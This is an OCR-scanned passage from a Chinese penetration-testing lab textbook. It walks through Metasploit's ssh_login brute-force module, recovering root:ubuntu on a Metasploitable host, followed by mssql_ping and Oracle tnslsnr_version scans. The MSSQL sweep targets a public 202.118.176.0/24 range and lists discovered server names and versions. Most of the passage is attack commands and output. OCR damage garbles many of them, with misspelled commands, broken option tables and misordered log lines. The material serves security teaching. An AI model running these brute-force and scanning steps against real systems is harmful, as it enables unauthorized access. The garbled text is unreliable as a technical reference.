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PASS_FILE, 即 准备 暴力 破解 使 用 的 密码 文件 ,PASSWORD 是 指定 单个 密码 , 而 
PASS FILE 则 是 将 密码 字典 放 到 一 个 文件 里 ,并 且 每 行 只 能 放置 一 个 密码 。 

STOP_ON_SUCCESS, 即 如 果 得 到 主机 正在 工作 的 消息 , 则 停止 试探 密码 ,一 般 是 设 
为 false 的 。 

USERNAME, [i] PASSWORD 一 样 ,虽然 要 求 不 是 必须 ,但 是 在 实际 使 用 中 是 需要 指 
定 的 。 

USERPASS_FILE, 是 同时 存储 了 密码 和 用 户 名 的 口令 字典 文件 。 每 行 包括 一 个 用 户 
名 和 对 应 的 一 个 密码 ,中 间 用 一 个 空格 分 隔 开 。 

USER_AS_PASS, 将 所 用 用 户 名 作为 它 的 密码 进行 猜测 。 这 在 实际 使 用 中 很 有 用 , 因 
为 经 常 有 些 安全 意识 薄弱 的 管理 员 这 样 设置 密码 。 

USER_FILE, 即 存储 试探 用 户 名 的 文件 ,同样 每 行 一 个 用 户 名 。 

VERBOSE, 即 是 否 在 窗口 输出 所 有 的 尝试 情况 ,默认 是 输出 的 。 

在 口令 猜测 时 ,明显 需要 设置 的 项 或 者 说 可 以 设置 的 项 多 了 很 多 ,这 就 需要 根据 实际 情 
况 进行 设置 。 下 面 , 举 一 个 简单 的 例子 : 

根据 上 次 实验 的 结果 ,选取 10. 10. 10. 254。 

(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary(ssh login)» set rhosts 10.10.10.254 

(A) 使 用 set 命令 设置 参数 username 的 值 。 

在 这 里 仅 尝试 用 户 名 为 root 的 情况 ,因此 代码 如 下 : 
msf auxiliary(ssh login)» set username root 

(5) 使 用 set 命令 设置 参数 pass_file 的 值 。 

将 名 称 为 words. txt 的 密码 字典 放 在 了 桌面 ,因此 代码 如 下 : 
nsf auxiliary(ssh login)» set pass file /root/Desktop/words.txt 
(6) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary(ssh login)» set threads 100 

(7) 使 用 run 命令 来 执行 扫描 。 

mef auxiliary(ssh login)» nn 

扫描 结果 显示 如 下 : 


[* ] 10.10.10.254:22 SSH - Starting bruteforce 

[* ] 10.10.10.254:22 SSH - [01/17] - Trying: usemame: 'root' with password: '" 

[- ] 10.10.10.254:22 SSH - [01/17] - Failed: 'root':'" 

[* ] 10.10.10.254:22 SSH - [02/17] - Trying: username: 'root' with password: "root" 

[- ] 10.10.10.254:22 SSH - [02/17] - Failed: 'root':'root' 

[* ] 10.10.10.254:22 SSH — [08/17] - ‘Trying: username: 'roct' with password: mejordom' 

E ] 10.10.10.254:22 SSH - [03/17] — Failed: 'root': majordam' 

[* ] 10.10.10.254:22 SSH - [04/17] - ‘Trying: usemame: "root" with password: ‘malcolm’ 
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— ] 10.10.10.254:22 SSH - [04/17] - Failed: 'root':'malcolm" 

* ] 10.10.10.254:22 SSH - [05/17] - Trying: usemame: "root" with password: ‘margaret’ 

— ] 10.10.10.254:22 SSH - [05/17] — Failed: "root": margaret" 

* ] 10.10.10.254:22 SH - [06/17] - Trying: usemame: 'roct' with password: "marilyn" 

— ] 10.10.10.254:22 SSH - [06/17] - Failed: 'roct':'marilyn' 

* ] 10.10.10.254:22 SSH - [07/17] - Trying: usemame: "root" with password: ‘mariposa’ 

— ] 10.10.10.254:22 SSH - [07/17] - Failed: "root": 'mariposa' 

* ] 10.10.10.254:22 SSH — [08/17] - Trying: username: 'roct' with password: "marlboro' 

- ] 10.10.10.254:22 SSH - [08/17] — Failed: 'roct':'marlboro" 

* ] 10.10.10.254:22 SH - [09/17] - Trying: usemgme: 'roct' with password: ‘marshal’ 

—- ] 10.10.10.254:22 SSH - [09/17] — Failed: 'roct': marshal’ 

* ] 10.10.10.254:22 SSH - [10/17] - ‘Trying: username: ‘root’ with password: maryjaney 

- ] 10.10.10.254:22 SSH - [10/17] - Failed: 'roct':'maryjare" 

* ] 10.10.10.254:22 SSH - [11/17] - Trying: usemame: 'roct' with password: 'masters' 

- ] 10.10.10.254:22 SSH - [11/17] - Failed: 'roct':'mesters" 

* ] 10.10.10.254:22 SSH - [12/17] - Trying: usermare: 'roct' with password: "matthew" 

- ] 10.10.10.254:22 SSH - [12/17] - Failed: 'roct':'metthew" 

* ] 10.10.10.254:22 SH - [13/17] - Trying: usermare: 'roct' with password: "maurice" 

- ] 10.10.10.254:22 SH - [13/17] - Failed: 'roct':'meurice" 

* ] 10.10.10.254:22 SH - [14/17] - Trying: usemare: 'roct' with password: "maveric" 

- ] 10.10.10.254:22 SSH - [14/17] - Failed: 'roct':'maveric" 

* ] 10.10.10.254:22 SSH - [15/17] - Trying: usemare: 'roct' with password: "maverick' 

- ] 10.10.10.254:22 SH - [15/17] - Failed: 'roct':'maverick" 

10.10.10.254:22 SSH - [16/17] - Trying: usemare: 'roct' with password: ubuntu" 
Command shell session 2 opened (10.10.10.130:50199 - > 10.10.10.254:22) at 2016- 05- 03 03:32:43 - 0400 
+ ] 10.10.10.254:22 SSH - [16/17] - Success: 'root':'ubuntu' 'uid- O(root) gid- 0 (root) groups= 0 (root) Linux 
metasploitable 2.6.24- 16- server # 1 SVP Thu Apr 10 13:58:00 UIC 2008 1686 GNU/Linux ' 
* ] Scanned 1 of 1 hosts (100% complete) 

* ] Auxiliary module execution completed 


可 以 看 出 ,在 第 16 次 尝试 下 ,终于 破解 了 目标 站 点 SSH 服务 的 账号 和 密码 ,username: 
‘root’ with password; ‘ubuntu。 因 为 没有 设置 VERBOSE 的 值 ,所 以 默认 是 将 所 有 的 尝试 
情况 进行 了 输出 。 

4. mssql ping 模块 

(1) 通过 use 命令 使 用 mssql_ping 模块 。 


msf> use auxiliary/scanner/mssql/mssql_ping 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 











* 


* 











msf auxiliary (ssql_ping)> show options 
查看 结果 如 下 : 
Module options (auxiliary/scanner/mssql/mssql ping): 


Name Current Setting Required Description 
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PASSWORD no ‘The password for the specified 


usemare 
RHOSTS yes The target actress range or CIIR 
THREADS 1 yes The nner of concurrent threads 
USERNAME, sa no The usermare to authenticate as 
USE WINDOWS AUTHENT false yes Use windows authentification 

(requires DOMAIN cpticn set) 


与 前 面 不 同 的 是 ,在 mssql_ping 模块 用 到 了 USERNAME 设置 项 ,这 其 实 与 Microsoft 
SQL Server 安装 时 候 的 一 个 默认 设置 有 关 。 在 初次 安装 服务 器 的 时 候 , 会 默认 创建 sa 或 
系统 管理 员 用户 。 因 此 ,这 里 USERNAME 设置 项 的 默认 设置 是 sa, 在 这 里 也 不 准备 进行 
更 改 了 。 

(3) 使 用 set 命令 设置 目标 地 址 范围 。 

nef auxiliary ftnssql_ ping)» set RHOSTS 202.118.176.0/24 

(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary (ssql_ping)> set THREADS 50 

(5) 使 用 run 命令 来 执行 扫描 。 

msf auxiliary (mssql_ping)> run 

设置 扫描 范围 扫描 后 的 结果 如 下 : 


* ] Scanned 050 of 256 hosts (01% canplete) 
* ] SQL Server information for 202.118.176.67: 


+] ServerName = HEU- MMJEAGEIZYW 

+] InstanosName =MSSQLSERVER 

+] IsClustered =No 

+] Version = 10.0.4000.0 

+] to -1433 

+] mp = \\HEU- MEATY pipe\ sql \query 


* ] Scanned 058 of 256 hosts (022% camplete) 
* ] Scanned 091 of 256 hosts (035% camplete) 
* ] SQL Server information for 202.118.176.104: 








+ ServerName =GC- 8FAFEF3BÜFBG 

+ InstanosName =MSSQLSERVER 

H IsClustered =No 

际 Version =8.00.194 

HE tgp =143 

+] n =\\GC- SE4EEFSBOEB6\pipe\ sql \query 
* ] SQL Server infomation for 202.118.176.108: 

十 ServerName = WIN- UBDUOHOGO7T 

+ InstanosName = HRBGRS 
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+ IsClustered =No 
+ Version =10.50.1600.1 
* ] SQL Server information for 202.118.176.124: 
+] ServerName -WI27 
+] InstanosName = = MSSQLSERVER 
* ] SQL Server infomation for 202.118.176.121: 
+ ServerName —ZICHA 
+ InstanosName = MSSQLSERVER 
十 tcp 三 49538 
* ] SQL Server information for 202.118.176.118: 
Ez ServerName. = T5- T81EICHKTUT 
InstanosName = MSSQLSERVER 
IsClustered =No 
Version =8.00.194 
IsClustered =No 
ia IsClustered =No 
teo -1433 
+] m = \\TS- TSSIELOHKIOT\pipe\ sql \ query 
+] Version =8.00.194 
EE top = 1433 
+] mp = \\W127\pipe\sql\query 
+] Version — 8.00.194 
ex top = 1433 
+] m = \\ZICHA\pipe\ sql\query 
* ] Scanned 141 of 256 hosts (055% camplete) 
* ] SQL Server information for 202.118.176.141: 
+ ServerName = HRBEUSZC- GKOS2H 
RS InstanosName =MSSQLSERVER 
+ IsClustered -No 
+] Version = 8.00.194 
EF top = 1433 
+] n = \\ HREEUSZC- GKOS2HN pipeN \sql\query 


* ] Scanned 142 of 256 hosts (055% camplete) 
* ] Scanned 178 of 256 hosts (069% camplete) 
* ] Scanned 184 of 256 hosts (071% camplete) 
* ] Scanned 232 of 256 hosts (090% camplete) 
* ] Scanned 241 of 256 hosts (094% camplete) 
* ] Scanned 256 of 256 hosts (100% camplete) 
* ] Auxiliary module execution ompleted 

从 扫描 结果 可 以 看 出 ,在 扫描 的 202. 118. 176. 0 网 络 范围 内 ,mssql_ping 模块 搜索 到 
202. 118. 176. 67,202. 118. 176. 104,202. 118. 176. 108,202. 118. 176. 124,202. 118. 176. 
121,202. 118. 176. 118 和 202. 118. 176. 141 J& 7 处 站 点 的 服务 器 采用 Microsoft SQL 
Server 服务 器 ,并 且 分 别 列 出 了 服务 器 名 称 ServerName, 实际 名 称 InstanceName ( Hl 
Microsoft SQL Server 服务 器 ) .是 否 为 集群 服务 器 IsClustered ,版 本 号 Version 以 及 TCP 
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端口 号 tcp 等 信息 。 
5. 'Inslsnr version 模块 
(1) 使 用 use 命令 使 用 tnslsnr. version 模块 。 


msf> use auxiliary/scanner/oracle/tnslsnr version 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 
msf auxiliary(tnslsnr version)» show options 

查看 结果 如 下 : 


Module options (auxiliary/scanner/oracle/tnslsnr_version) : 


RHOSTS yes ‘The target address range or CITR identifier 
RECRT 1521 yes The target port 
THREADS 1 yes The nmiber of concurrent threads 


tnslsnr_version 模块 需要 设置 的 选项 更 少 ,也 更 加 简单 。 
(3) 使 用 set 命令 设置 目标 地 址 范围 。 


mf auxiliary(tnslsnr version)» set RHOSTS 10.10.10.0/24 
(A) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary(tnslsnr versicn)» set THREADS 50 

(5) 使 用 run 命令 来 执行 扫描 。 

msf auxiliary(tnslsnr_version)> run 

扫描 结果 如 下 : 


* ] Scanned 051 of 256 hosts (019% camplete) 
* ] Scanned 096 of 256 hosts (037% camplete) 
* ] Scanned 101 of 256 hosts (03% camplete) 
+ ] 10.10.10.130:1521 Oracle - Version: 32-bit Windows: Version 10.2.0.1.0 - Production 
* ] Scanned 144 of 256 hosts (056% camplete) 
* ] Scanned 148 of 256 hosts (057% camplete) 
* ] Scanned 182 of 256 hosts (071% camplete) 
* ] Scanned 194 of 256 hosts (075% camplete) 
* ] Scanned 232 of 256 hosts (090% camplete) 
* ] Scanned 241 of 256 hosts (094% omplete) 
* ] Scanned 256 of 256 hosts (100% camplete) 
* ] Auxiliary module execution carpleted 


可 以 看 出 ,在 选择 扫描 的 网 络 中 ,发现 有 一 个 站 点 即 10. 10. 10. 130 有 开放 使 用 的 


Oracle 数据 库 ,并 且 其 版 本 Version 为 10. 2. 0. 1. 0- Production 版 本 。 
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实验 报告 要 求 
。 实验 目的 。 


。 附 上 实验 过 程 的 截图 和 结果 截图 。 


阐述 碰 到 的 问题 以 及 解决 方法 。 
阐述 收获 与 体会 。 
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